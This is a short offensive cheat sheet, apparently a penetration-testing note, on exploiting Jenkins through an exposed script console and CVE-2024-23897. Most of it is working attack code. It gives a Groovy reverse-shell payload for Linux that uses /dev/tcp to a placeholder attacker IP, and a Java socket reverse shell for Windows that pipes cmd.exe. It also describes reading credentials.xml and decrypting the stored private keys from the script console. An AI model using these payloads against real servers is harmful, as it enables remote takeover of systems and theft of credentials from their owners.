Exploiting Jenkins / CVE-2024-23897
Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script
If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below)
Groovy scripts can be executed from the script console.
To get a reverse shell, execute the following script.
For Linux,
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
For Windows,
String host="YOUR_IP";
int port=PORT;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
For privilege escalation, to get the private keyAccess the credentials.xml file under /var/jenkins_home/.
Copy the encrypted private key and decode it from the script console.
You may use the CVE-2024-23897(Arbitrary File Read Vulnerability) to exploit the vulnerability and read the files in the system.
Use the following command to decrypt.
println hudson.util.Secret.decrypt("{ENCRYPTED_PRIVATE_KEY}")